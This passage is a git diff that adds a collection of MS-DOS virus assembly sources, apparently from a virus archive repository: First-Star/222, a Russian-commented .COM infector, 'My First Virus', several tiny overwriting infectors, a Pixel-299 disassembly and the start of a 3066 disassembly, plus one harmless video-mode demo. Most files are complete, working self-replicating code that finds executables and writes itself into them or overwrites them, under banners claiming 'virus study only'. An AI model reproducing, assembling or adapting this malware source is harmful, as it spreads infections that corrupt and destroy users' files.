DW 1A18H + DW 22B3H + DW 0822H + DW 1BB1H + DW 1A01H + DW 22B1H + DW 0B302H + DW 0DB3H + DW 1811H + DW 0D919H + DW 1002H + DW 1BDFH + DW 0805H + DW 1BB1H + DW 0D811H + DW 0918H + DW 0DBC6H + DW 011BH + DW 021AH + DW 0B3B3H + DW 120DH + DW 2218H + DW 0DFD9H + DW 1B10H + DW 0806H + DW 1BB1H + DW 0B111H + DW 121BH + DW 0D1AH + DW 1812H + DW 0D921H + DW 10DFH + DW 011BH + DW 0C208H + DW 1118H + DW 0DBC6H + DW 121BH + DW 281AH + DB 2 + DB '(,GZG' + DW 5E02H + DW 0102H + DB '========"""' + DW 0111H + DW 0202H + DW 2802H + DW 0EFD3H + DW 1348H + DW 7B68H + DW 14D4H + DW 0202H + DW 0202H + DB 'FMQ' + DB 2 + DB '""""' + DW 0202H + DW 0202H + DW 0102H + DB '========GZG' + DW 0705H + DW 2302H + DW 2802H + DW 0EFD3H + DB 'H"*' + DW 2300H + DW 0002H + DW 0202H + DB 2 + DB 'VCPEGP,GZG' + DW 0202H + DW 9502H + DW 4432H + DW 7304H + DW 9504H + DW 0232H + DB 'VGOR' + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0207H + DW 002AH + DW 0223H + DW 0222H + DW 22CFH + DW 0202H +H006F1: + MOV DX,3202H + IRET +P00100 ENDP + DW 3E23H + DW 7001H + DW 0B629H + DW 0CF2EH + DW 8A23H + DW 0114H + DW 0B603H + DW 0CF28H + DW 8223H + DW 1BF8H + DW 067EH + DW 073EH + DW 0176H + DW 77E9H + DW 0BC92H + DW 033AH + DW 02BAH + DW 8CBAH + DW 0BDC2H + DW 0202H + DW 06BBH + DW 0EA07H + DW 0207H + DW 0FCE9H + DW 88EBH + DW 0E102H + DW 8959H + DW 31D5H + DW 0FEC2H + DB 0AEH + DB '>"p' + DW 0A907H + DW 0FAE0H + DW 4EE9H + DW 123EH + DW 0571H + DW 0E682H + DW 08F2H + DW 0E9E2H + DW 3EF3H + DW 761AH + DW 7111H + DW 2E1BH + DW 0012H + DW 00C2H + DW 00C2H + DW 00C2H + DW 82C2H + DW 8DE6H + DW 0E208H + DW 0D8E9H + DW 0C083H + DW 02A2H + DW 0F889H + DW 0D0E9H + DW 193EH + DW 0570H + DW 0CE77H + DW 0F682H + DW 0E982H + DW 3EC5H + DW 891BH + DW 0AEDBH + DW 0CA88H + DW 22B2H + DW 0076H + DW 49AEH + DW 0EF30H + DW 0F143H + DW 89A9H + DW 4BC9H + DW 0A8E2H + DW 0B8C1H + DW 0444H + DW 18B6H + DW 23CFH + DW 1BB6H + DW 23CFH + DW 0D288H + DW 0C0FCH + DW 45B6H + DW 0A7BCH + DW 0CF04H + DW 0B823H + DW 0446H + DW 39B6H + DW 23CFH + DW 11BBH + DW 0B802H + DW 043EH + DW 4CB6H + DW 23CFH + DW 103FH + DW 7702H + DW 0E901H + DW 9253H + DW 4DB6H + DW 23CFH + DW 103FH + DW 7602H + DW 0B845H + DW 0466H + DW 39B6H + DW 23CFH + DW 2DB6H + DW 23CFH + DW 048EH + DW 049EH + DW 1C8BH + DW 049CH + DW 73B8H + DW 0B604H + DW 0CF18H + DW 0BB23H + DW 0205H + DW 3CB8H + DW 0B604H + DW 0CF4CH + DW 3F23H + DW 0210H + DW 2377H + DW 4DB6H + DW 23CFH + DW 103FH + DW 7702H + DW 0B81AH + DW 0446H + DW 39B6H + DW 23CFH + DW 18B6H + DW 1C8CH + DW 049EH + DW 1489H + DW 049CH + DW 23CFH + DW 0B2E9H + DW 7BE9H + DW 0B692H + DW 0CF2DH + DW 8E23H + DW 0A004H + DW 8B04H + DW 0A21CH + DW 0B804H + DW 048DH + DW 73B9H + DW 8904H + DW 1A45H + DW 0EBA1H + DW 8904H + DW 1445H + DW 0E5A1H + DW 8904H + DW 1745H + DW 02BAH + DW 0CF41H + DW 8B23H + DW 0E90CH + DW 0BA04H + DW 4103H + DW 0CB31H + DW 23CFH + DW 02BAH + DW 0CF3FH + DB '#p!' + DW 0E7A1H + DW 0B604H + DW 893DH + DW 0E71CH + DW 0BB04H + DW 0200H + DW 0EFB8H + DW 0CF04H + DW 0B623H + DW 893CH + DW 0E71CH + DW 0CF04H + DW 8923H + DW 0EF1CH + DW 8304H + DW 0E9F9H + DW 7700H + DW 0B60DH + DW 8C18H + DW 0A01CH + DW 8904H + DW 0A214H + DW 0CF04H + DW 0EB23H + DW 0FD77H + DW 8DB8H + DW 0BA04H + DW 3F00H + DW 23CFH + DW 0E7A1H + DW 0EA04H + DW 0FA9DH + DW 03BAH + DW 8955H + DW 0E71CH + DW 8904H + DW 0E50CH + DW 8904H + DW 0EB14H + DW 0CF04H + DW 0BA23H + DW 4103H + DW 0C89H + DW 04E9H + DW 8DB8H + DW 0CF04H + DW 0B623H + DW 0B839H + DW 0446H + DW 23CFH + DW 39B6H + DW 0A7B8H + DW 0CF04H + DW 0BA23H + DW 4E02H + DB 0CFH + DB '#OaCdgg"upmvg"Ujcng######' +S00000 ENDS + END P00100 + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.1st_star.asm b/MSDOS/Virus.MSDOS.Unknown.1st_star.asm new file mode 100644 index 00000000..352b021d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1st_star.asm @@ -0,0 +1,161 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +; +; First-Star / 222 Virus +; +; (C) by Glenn Benton in 1992 +; This is a non-resident direct action .COM infector in current dirs. +; +; +; + Org 0h + +Start: Jmp MainVir + Db '*' + +MainVir: Call On1 +On1: Pop BP + Sub BP,Offset MainVir+3 + Push Ax + Mov Ax,Cs:OrgPrg[BP] + Mov Bx,Cs:OrgPrg[BP]+2 + Mov Cs:Start+100h,Ax + Mov Cs:Start[2]+100h,Bx + Mov Ah,1ah + Mov Dx,0fd00h + Int 21h + Mov Ah,4eh +Search: Lea Dx,FileSpec[BP] + Xor Cx,Cx + Int 21h + Jnc Found + Jmp Ready +Found: Mov Ax,4300h + Mov Dx,0fd1eh + Int 21h + Push Cx + Mov Ax,4301h + Xor Cx,Cx + Int 21h + Mov Ax,3d02h + Int 21h + Mov Bx,5700h + Xchg Ax,Bx + Int 21h + Push Cx + Push Dx + Mov Ah,3fh + Lea Dx,OrgPrg[BP] + Mov Cx,4 + Int 21h + Mov Ax,Cs:[OrgPrg][BP] + Cmp Ax,'MZ' + Je ExeFile + Cmp Ax,'ZM' + Je ExeFile + Mov Ah,Cs:[OrgPrg+3][BP] + Cmp Ah,'*' + Jne Infect +ExeFile: Call Close + Mov Ah,4fh + Jmp Search +FSeek: Xor Cx,Cx + Xor Dx,Dx + Int 21h + Ret +Infect: Mov Ax,4202h + Call FSeek + Sub Ax,3 + Mov Cs:CallPtr[BP]+1,Ax + Mov Ah,40h + Lea Dx,MainVir[BP] + Mov Cx,VirLen + Int 21h + Mov Ax,4200h + Call FSeek + Mov Ah,40h + Lea Dx,CallPtr[BP] + Mov Cx,4 + Int 21h + Call Close +Ready: Mov Ah,1ah + Mov Dx,80h + Int 21h + Pop Ax + Mov Bx,100h + Push Cs + Push Bx + Retf +Close: Pop Si + Pop Dx + Pop Cx + Mov Ax,5701h + Int 21h + Mov Ah,3eh + Int 21h + Mov Ax,4301h + Pop Cx + Mov Dx,0fd1eh + Int 21h + Push Si + Ret + +CallPtr Db 0e9h,0,0 +FileSpec Db '*.COM',0 + +OrgPrg: Int 20h + Nop + Nop + +VirLen Equ $-MainVir + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; + +;; +;> and Remember Don't Forget to Call <; +;> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <; +;; + diff --git a/MSDOS/Virus.MSDOS.Unknown.1stvirus.asm b/MSDOS/Virus.MSDOS.Unknown.1stvirus.asm new file mode 100644 index 00000000..32e5930b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1stvirus.asm @@ -0,0 +1,165 @@ +; 쪨 ( 让) , ࠦ騩 .COM-ணࠬ +; ᪥, ᫨ 砫 JMP. +; ஢ન 直 筮 . +; +; Copyright (c) 1992, Gogi&Givi International. +; + +.model tiny +.code + org 0100h +start: + jmp virusstart ; 室 : + mov ah,09h ; ⠪, 㤥 + int 21h ; ⢮ + mov ax,4C00h ; ࠦ + int 21h + Message db 'This is little infection... He-he...',13,10,'$' + ; ଠ + ; + +virusstart: ; + pushf + push ax ; ࠭塞 , + push bx ; ⮫쪮 ... + push cx + push dx + push ds ; , ᪮쪮 + push es ; ࠢ쭮... + push si + call SelfPoint +SelfPoint: ; ।塞 + pop si ; 室 + + cld ; ࠢ + push cs ; ⠢ ᥣ + pop ds ; ॣ 祭 + push cs ; ࠢ + pop es + mov di,0100h ; ਥ - 0100h, + push si ; 砫 ணࠬ + add si,original-SelfPoint ; SI 㪠뢠 + mov cx,3 ; ਣ + rep movsb ; 㥬 砫 + pop si ; ࠦ ணࠬ + + mov ah,1Ah ; ⠢ ᮡ⢥ + mov dx,si ; DTA + add dx,VirusDTA-SelfPoint ; 21h 뢠 + int 21h + + mov ah,4Eh ; FindFirst + mov dx,si ; ᮮ⢥饩 + add dx,FileMask-SelfPoint ; ᪮ + mov cx,32 ; ਡ⮬ ⥭/ + int 21h ; , ⮡ + ; + jnc RepeatOpen ; 訡 - 뢠 + + jmp OutVirus ; 襫... + +RepeatOpen: + mov ax,3D02h ; ஥ 䠩 + mov dx,si ; ७ + add dx,NameF-SelfPoint ; ࠢ + int 21h + jc OutVirus ; 訡 室 + + mov bx,ax ; 쬥 䠩, + ; 㤥 ঠ BX + + mov ah,3Fh ; 뢠 騥 + mov dx,si ; + add dx,Original-SelfPoint ; ᯮ + mov cx,3 ; 㤥 + int 21h + jc OutVirus ; ஢ਬ 訡... + push bx + mov bx,dx + cmp byte ptr [bx],'' ; ⮬ 䠩 + pop bx ; ⮦ ᭠砫 室? + ; + je CloseNotInfect ; ࠦ! + ; , 筥 + ; ஢... + + mov ax,4202h ; 룠 + xor cx,cx ; (ᨫ) + xor dx,dx + int 21h ; AX + jc OutVirus ; 砫 + ; , ᫨ , + ; 筮, 訡 + push ax + + mov ah,40h ; 襬 + mov dx,si ; ⥫ + sub dx,SelfPoint-VirusStart ; 䠩- + mov cx,VirusEnd-VirusStart ; ⢮ + int 21h + + pop ax + jc OutVirus ; 訡 - + ; , ⠬, ९... + + sub ax,3 ; ⠥ 3 - ⮡ + push bx ; 㤠 + mov bx,si + sub bx,SelfPoint-VirusStart + mov word ptr cs:[bx+1],ax ; + mov byte ptr [bx],'' ; 室 ( + ; । ᥣ) + pop bx + + mov ax,4200h ; ⥯ 砫 + xor cx,cx ; + xor dx,dx + int 21h + jc OutVirus ; ஢ઠ 訡 + + mov ah,40h ; 襬 㤠 + mov dx,si ; 室 + sub dx,SelfPoint-VirusStart ; ᭮ + mov cx,3 ; ⥫ + int 21h + jc OutVirus ; ஢ਬ 訡 + + mov ah,3Eh ; + int 21h ; ( 㦥 ࠦ - + jmp OutVirus ; ࠡ⠥) + +CloseNotInfect: + mov ah,3Eh ; 뢠 室騩 + int 21h ; 䠩 + + mov dx,si + add dx,FileMask-SelfPoint ; FindNext + mov ah,4Fh + int 21h + jc OutVirus ; 訡 - , 졠 + jmp RepeatOpen ; 室 ⨥ + +OutVirus: + pop si ; , 筮 , + pop es ; ᢥ + pop ds ; ⠭ + pop dx + pop cx + pop bx + pop ax + popf + mov si,0100h ; ᨬ ⥪ + push si ; 砫 ணࠬ + ret ; RET + + ; : + +VirusDTA db 30 dup (0) ; DTA +NameF db 13 dup (0) ; 㤥 䠩 +FileMask db '*.cOm',(0) ; ⠪ ᨢ + ; ᪠ +original: + mov dx,offset Message ; ਣ +VirusEnd: ; (᪨, + ; !) + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.203.asm b/MSDOS/Virus.MSDOS.Unknown.203.asm new file mode 100644 index 00000000..6f9d33a6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.203.asm @@ -0,0 +1,187 @@ +;****************************************************************** +;* * +;* My First Virus, a simple non-overwriting COM infector * +;* * +;* by, Solomon * +;* * +;****************************************************************** + + .model tiny ; Memory model + .code ; Start Code + org 100h ; Start of COM file + +MAIN: db 0e9h,00h,00h ; Jmp START_VIRUS + +START_VIRUS proc near ; Real start of Virus + call FIND_OFFSET + +; Calculate change in offset from host program. + +FIND_OFFSET: pop bp ; BP holds current IP + sub bp, offset FIND_OFFSET ; Calculate net change + ; Change BP to start of + ; virus code + +; Restore original bytes to the infected program. + + lea si,[bp+ORIG_START] ; Restore original 3 bytes + mov di,100h ; to 100h, start of file + push di ; Copy 3 bytes + movsw + movsb + +; Change the DTA from the default so FINDFIRST/FINDNEXT won't destroy +; original command line parameters. + + lea dx,[bp+NEW_DTA] ; Point to new DTA area + call SET_DTA ; Go change it + +; DOS Findfirst / Findnext services + + +FINDFIRST: mov ah,4eh ; DOS find first service + lea dx,[bp+COM_MASK] ; Search for any COM file + xor cx,cx ; Attribute mask +FINDNEXT: int 21h ; Call DOS to do it + jc QUIT ; Quit if there are errors + ; or no more files + +; Ok, if I am here, then I found a possible victim. Open the file and +; check it for previous infections. + + mov ax,3d00h ; DOS Open file, read only + lea dx,[bp+NEW_DTA+30] ; Point to filename we found + int 21h ; Call DOS to do it + xchg ax,bx ; Put file handle in BX + +; Check file for previous infection by checking for our presence at +; then end of the file. + + mov ah,3fh ; DOS Read file + lea dx,[bp+ORIG_START] ; Save the original header + mov cx,3 ; Read 3 bytes + int 21h ; Call DOS to do it + mov ax,word ptr [bp+NEW_DTA+26] ; Put filename in AX + mov cx,word ptr [bp+ORIG_START+1] ; Jmp offset + add cx,END_VIRUS-START_VIRUS+3; Convert to filesize + cmp ax,cx ; Compare file size's + jnz INFECT_COM ; If healthy, go infect it + mov ah,3eh ; Otherwise close file and + int 21h ; try to find another victim + mov ah,4fh ; DOS find next file + jmp short FINDNEXT ; Find another file + +; Restore default DTA and pass control back to original program. +; Call any activation routines here. + +QUIT: mov dx,80h ; Restore original DTA + call SET_DTA ; Go change it + retn ; End Virus and start original + ; Program. Remember, DI holding + ; 100h was pushed on the stack. + +;*** Subroutine INFECT_COM *** + +INFECT_COM: + +; Reset the file attributes to normal so I can write to the file + + mov ax,4301h ; DOS change file attr + xor cx,cx ; Zero attributes + lea dx,[bp+NEW_DTA+30] ; Point to filename in DTA + int 21h ; Call DOS to do it + +; Calculate jump offset for header of victim so it will run virus first. + + mov ax,word ptr [bp+NEW_DTA+26] ; Put filesize in AX + sub ax,3 ; Subtract 3, size-jmp_code + mov word ptr [bp+JMP_OFFSET],ax ; Store new offset + +; Close the file and reopen it for read/write. BX still holds file handle. + + mov ah,3eh ; DOS close file + int 21h ; Call DOS to do it + mov ax,3d02h ; DOS open file, read/write + int 21h ; Call DOS to do it + xchg ax,bx ; Put file handle in BX + +; Write the new header at the beginning of the file. + + mov ah,40h ; DOS write to file + mov cx,3 ; Write 3 bytes + lea dx,[bp+HEADER] ; Point to the 3 bytes to write + int 21h ; Call DOS to do it + +; Move to end of file so I can append the virus to it. + + mov al,2 ; Select end of file + call FILE_PTR ; Go to end of file + +; Append the virus to the end of the file. + + mov ah,40h ; DOS write to file + mov cx,END_VIRUS-START_VIRUS ; Length of virus + lea dx,[bp+START_VIRUS] ; Start from beginning of virus + int 21h ; Call DOS to do it + +; Restore the file's original timestamp and datestamp. These values were +; stored in the DTA by the Findfirst / Findnext services. + + mov ax,5701h ; DOS set file date & time + mov cx,word ptr [bp+NEW_DTA+22] ; Set time + mov dx,word ptr [bp+NEW_DTA+24] ; Set date + int 21h ; Call DOS to do it + +; Restore original file attributes. + + mov ax,4301h ; DOS change file attr + mov cx,word ptr [bp+NEW_DTA+21] ; Get original file attr + lea dx,[bp+NEW_DTA+30] ; Point to file name + int 21h ; Call DOS + +; Lastly, close the file and go back to main program. + + mov ah,3eh ; DOS close file + int 21h ; Call DOS to do it + jmp QUIT ; We're done + +;*** Subroutine SET_DTA *** + +SET_DTA proc near + mov ah,1ah ; DOS set DTA + int 21h ; Call DOS to do it + retn ; Return +SET_DTA endp + + +;*** Subroutine FILE_PTR *** + + +FILE_PTR proc near + mov ah,42h ; DOS set read/write pointer + xor cx,cx ; Set offset move to zero + cwd ; Equivalent to xor dx,dx + int 21h ; Call DOS to do it + retn ; Return +FILE_PTR endp + + + +; This area will hold all variables to be encrypted + +COM_MASK db '*.com',0 ; COM file mask + +ORIG_START db 0cdh,20h,0 ; Header for infected file + +HEADER db 0e9h ; Jmp command for new header + +START_VIRUS endp + +END_VIRUS equ $ ; Mark end of virus code + +; This data area is a scratch area and is not included in virus code. + +JMP_OFFSET dw ? ; Jump offset for new header +NEW_DTA db 43 dup(?) ; New DTA location + + end MAIN diff --git a/MSDOS/Virus.MSDOS.Unknown.23.asm b/MSDOS/Virus.MSDOS.Unknown.23.asm new file mode 100644 index 00000000..5a1c07b3 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.23.asm @@ -0,0 +1,37 @@ +; The EXEcution III Virus. +; +; Well, you're now the prouw owner of the smallest virus ever made! +; only 23 bytes long and ofcourse again very lame.. +; But what the heck, it's just an educational piece of code!! +; +; (C) 1993 by [DRkRY] of TridenT (Ooooooranje Boooooooven!) +; +; Tnx to myself, my assembler, DOS (yuck) and to John Tardy for his +; nice try to make the smallest (27 bytes and 25 bytes) virus... gotcha!! ;-)) +; +; BTW Don't forget, I only tested it unter DOS 5.0 so on other versions +; it might not work! + +_CODE SEGMENT + ASSUME CS:_CODE + + ORG 100h +START: ; That's where we're starting... + FILE DB '*.*',0h ; Dummy instruction, SUB's 0FFh from CH + + MOV AH,4Eh ; Let's search! +DO_IT: MOV DX,SI ; Make DX = 100h (offset file) + INT 21h ; Search now dude! + + MOV AX,3D01h ; Hmm, infect that fucking file! + MOV DX,9Eh ; Name is at DS:[9Eh] + INT 21h ; Go do it! + XCHG BX,AX ; Put the handle in BX + + MOV AH,40h ; Write myself! + JMP DO_IT ; Use other routine + +_CODE ENDS + END START + +; If you don't like my english: Get lost, you can understand it! diff --git a/MSDOS/Virus.MSDOS.Unknown.25.asm b/MSDOS/Virus.MSDOS.Unknown.25.asm new file mode 100644 index 00000000..ec555e8e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.25.asm @@ -0,0 +1,30 @@ +; Basic little bitty program for people learning about the different modes +; you can stick on your monitor. This program will put you into 80*50 on a +; VGA monitor, and should be 80*43 on an EGA monitor (I dunno, haven't tested +; it.) Anyways, I tried to comment it so someone not knowing asm would be +; able to understand it. +; +; Coded by The Crypt Keeper/Kevin Marcus +; You may feel free to do absolutely anything to this code, so long as it is +; not distributed in a modified state. (Incorporate it in your programs, I +; don't care. Just do not change >THIS< program.) +; +; The Programmer's Paradise. (619)/457-1836 + +IDEAL ; Ideal Mode in TASM is t0tallie /< rad man. +DOSSEG ; Standard Segment shit. +MODEL tiny ; What model are we in?! +DATASEG ; Data Segment starts here, man. +exitcode db 0 ; 'exitcode' be zer0, man. +CODESEG ; Code Segment starts here, dude. + org 100h ; Where do .COM files start? +Start: + mov ax,0003h ; stick 3 into ax. + int 10h ; Set up 80*25, text mode. Clear the screen, too. + +Exit: + + mov ah,4ch ; Lets ditch. + mov al,[exitcode] ; Make al 0. Why not xor!? Suck a ____. + int 21h ; "Make it so." + END Start ; No more program. \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.299.asm b/MSDOS/Virus.MSDOS.Unknown.299.asm new file mode 100644 index 00000000..62a866ff --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.299.asm @@ -0,0 +1,150 @@ + +;***************************************************************************** +; +; Pixel - 299 virus +; +; Disassembled By Admiral Bailey [YAM '92] +; +; Notes: I dont know where the hell I got this one from but when I found it on +; one of my disks it was named incorectly. Some Amst shit but I looked +; it up in the vsum and its named as Pixel so Il use that name. +; Anyways its just a plain com infecting virus that displays a messege +; when executed. Nothing big. +; +;***************************************************************************** + +data_1e equ 6Ch +data_2e equ 96h +data_3e equ 98h +data_4e equ 9Eh +data_15e equ 12Bh ;* +data_16e equ 12Dh ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +Pixel proc far + +start: + jmp short begin + dw 5649h +data_7 db 0 +data_8 db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0 ; '*.com' +data_10 dw 0, 8918h +data_12 dw 0 + +begin: ; loc_1: + push ax + mov ax,cs + add ax,1000h + mov es,ax + inc data_7 + mov si,100h + xor di,di ; Zero register + mov cx,12Bh + rep movsb ; Mov [si] to es:[di] + mov dx,offset data_8 ; load the type of file to find + mov cx,6 ; Im not sure what attrib + mov ah,4Eh ; Find first file + int 21h ; + + jc quit ; if none found then... +get_file: ; loc_2 + mov dx,data_4e ; file name + mov ax,3D02h ; open file + int 21h + + mov bx,ax + push es + pop ds + mov dx,data_15e ; buffer for read + mov cx,0FFFFh ; number of bytes to read + mov ah,3Fh ; read file + int 21h + + add ax,12Bh + mov cs:data_12,ax + cmp word ptr ds:data_16e,5649h ; probably comparing size + je not_this_file ; of file + xor cx,cx ; Zero register + mov dx,cx + mov ax,4200h ; move file pointer + int 21h + + jc not_this_file ; if error the quit this file + xor dx,dx ; Zero register + mov cx,cs:data_12 + mov ah,40h ; write virus to file + int 21h + + mov cx,cs:data_2e ; old date + mov dx,cs:data_3e ; new time + mov ax,5701h ; set files date & time + int 21h + +not_this_file: ; loc_3: + mov ah,3Eh ; close this file + int 21h + + push cs + pop ds + mov ah,4Fh ; find another file + int 21h + + jc quit ; if none found quit + jmp short get_file ; if found then infect +quit: ; loc_4 + cmp data_7,5 + jb loc_5 ; Jump if below + mov ax,40h + mov ds,ax + mov ax,ds:data_1e + push cs + pop ds + and ax,1 + jz loc_5 ; Jump if zero + mov dx,offset data_13 ; gets the messege + mov ah,9 ; display string + int 21h + + int 20h ; Quit program + +data_13 db 'Program sick error:Call doctor o' ; messege + db 'r buy PIXEL for cure description' ; displayed when + db 0Ah, 0Dh, '$' ; run +loc_5: + mov si,offset data_14 + mov cx,22h + xor di,di ; Zero register + rep movsb ; Rep when cx >0 Mov [si] to es + pop bx + mov cs:data_10,0 + mov word ptr cs:data_10+2,es + jmp dword ptr cs:data_10 + +data_14 db 1Eh ; cant figure this + db 07h,0BEh, 2Bh, 02h,0BFh, 00h ; part out... + db 01h,0B9h,0FFh,0FFh, 2Bh,0CEh ; probably infected + db 0F3h,0A4h, 2Eh,0C7h, 06h, 00h ; file before. + db 01h, 00h, 01h, 2Eh, 8Ch, 1Eh + db 02h, 01h, 8Bh,0C3h, 2Eh,0FFh + db 2Eh, 00h, 01h,0CDh ; this is an int 20h + db 20h + +Pixel endp + +seg_a ends + + end start + + +>>> Article From Evolution #1 - YAM '92 + +Article Title: Thrasher Trojan Disassembly +Author: Natas Kaupas + + + diff --git a/MSDOS/Virus.MSDOS.Unknown.29bytes.asm b/MSDOS/Virus.MSDOS.Unknown.29bytes.asm new file mode 100644 index 00000000..1ea72ccc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.29bytes.asm @@ -0,0 +1,35 @@ +;Smallest in the trivial series of viruses, I think.... +;Last I saw was 30 bytes - this one goes to 29. +;Code by Stormbringer... stupid virus, but small. + +.model tiny +.radix 16 +.code + org 100 +start: + +FindFile: + xchg cx,ax ;ax defaults to zero on runtime - cx doesn't + push si ;si defaults to 100h under dos - use this l8r + mov dx,offset filemask + mov ah,4e + int 21 + +OverwriteFile: + mov dx,9e + mov ah,3c + int 21 + +WriteVirus: + xchg bx,ax + mov ah,40 + pop dx ;get 100h from si earlier for write pointer + mov cl,endvir-start ;move only to CL, CH is already zero + int 21 + +Terminate: + ret ;terminate by returning to PSP (Int 20) + +filemask db '*.*',0 +endvir: +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.30.asm b/MSDOS/Virus.MSDOS.Unknown.30.asm new file mode 100644 index 00000000..66f6c9c1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.30.asm @@ -0,0 +1,26 @@ +code segment + assume cs:code,ds:code,es:code,ss:code + org 100h +main proc near + mov dx,offset(nev) ; offset to '*.*' + mov ah,4Eh + int 21h ; find first + mov dx,009Eh + mov ax,3D01h ; writing + int 21h ; open a file + mov bx,ax + mov ah,40h + mov cl,offset(nev)-100h+4 ; byte-szam + mov dx,100h + int 21h ; write to file +nev: DB '*.*' +DB 0h +main endp +code ends + end main + +;; +;> and Remember Don't Forget to Call <; +;> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <; +;; + diff --git a/MSDOS/Virus.MSDOS.Unknown.3066.asm b/MSDOS/Virus.MSDOS.Unknown.3066.asm new file mode 100644 index 00000000..70933dc5 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.3066.asm @@ -0,0 +1,1491 @@ + +PAGE 59,132 + +; +; +; 3066 +; +; Created: 19-Mar-89 +; Version: +; Passes: 5 Analysis Options on: QRS +; +; +; + +.286c + +data_1e equ 24h ; (0000:0024=45h) +data_2e equ 26h ; (0000:0026=3D1h) +data_3e equ 70h ; (0000:0070=0FF53h) +data_4e equ 72h ; (0000:0072=0F000h) +data_5e equ 80h ; (0000:0080=1094h) +data_6e equ 82h ; (0000:0082=123h) +data_7e equ 84h ; (0000:0084=109Eh) +data_8e equ 86h ; (0000:0086=123h) +data_9e equ 90h ; (0000:0090=156h) +data_10e equ 92h ; (0000:0092=44Bh) +data_11e equ 9Ch ; (0000:009C=0BCh) +data_13e equ 0B3h ; (0000:00B3=1) +data_14e equ 0C8h ; (0000:00C8=0DAh) +data_15e equ 0D1h ; (0000:00D1=10h) +data_16e equ 0DFh ; (0000:00DF=1) +data_17e equ 0E3h ; (0000:00E3=1) +data_18e equ 0EAh ; (0000:00EA=123h) +data_19e equ 0ECh ; (0000:00EC=10DAh) +data_20e equ 0EEh ; (0000:00EE=23h) +data_21e equ 0F1h ; (0000:00F1=10h) +data_22e equ 151h ; (0000:0151=0EAh) +data_23e equ 153h ; (0000:0153=0A6F0h) +data_24e equ 155h ; (0000:0155=0EAh) +data_25e equ 449h ; (0000:0449=3) +data_26e equ 972h ; (0000:0972=74h) +data_27e equ 80h ; (00AE:0080=0FFh) +data_28e equ 0A0h ; (5E5F:00A0=0FFh) +data_29e equ 0F00h ; (5E5F:0F00=0FFh) +data_30e equ 0FA0h ; (5E5F:0FA0=0FFh) +data_31e equ 0FF60h ; (5E5F:FF60=0FFFFh) +data_32e equ 0E0h ; (683D:00E0=0FFFFh) +data_33e equ 0 ; (6FB8:0000=0) +data_34e equ 4 ; (6FB8:0004=0) +data_35e equ 5 ; (6FB8:0005=0) +data_36e equ 87h ; (6FB8:0087=0) +data_37e equ 0A0h ; (6FB8:00A0=0) +data_38e equ 0DFh ; (6FB8:00DF=0) +data_39e equ 0E0h ; (6FB8:00E0=0) +data_40e equ 0E2h ; (6FB8:00E2=0) +data_41e equ 0E3h ; (6FB8:00E3=0) +data_42e equ 0E4h ; (6FB8:00E4=0) +data_43e equ 0E6h ; (6FB8:00E6=0) +data_44e equ 0E8h ; (6FB8:00E8=0) +data_45e equ 0EAh ; (6FB8:00EA=0) +data_46e equ 0ECh ; (6FB8:00EC=0) +data_47e equ 0EEh ; (6FB8:00EE=0) +data_48e equ 0EFh ; (6FB8:00EF=0) +data_49e equ 0F1h ; (6FB8:00F1=0) +data_50e equ 0F3h ; (6FB8:00F3=0) +data_51e equ 0F5h ; (6FB8:00F5=0) +data_93e equ 100h ; (7188:0100=0) +data_94e equ 0E2h ; (969B:00E2=0) + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +3066 proc far + +start: + jmp loc_5 ; (0243) + db 01h,0B4h +data_54 dw 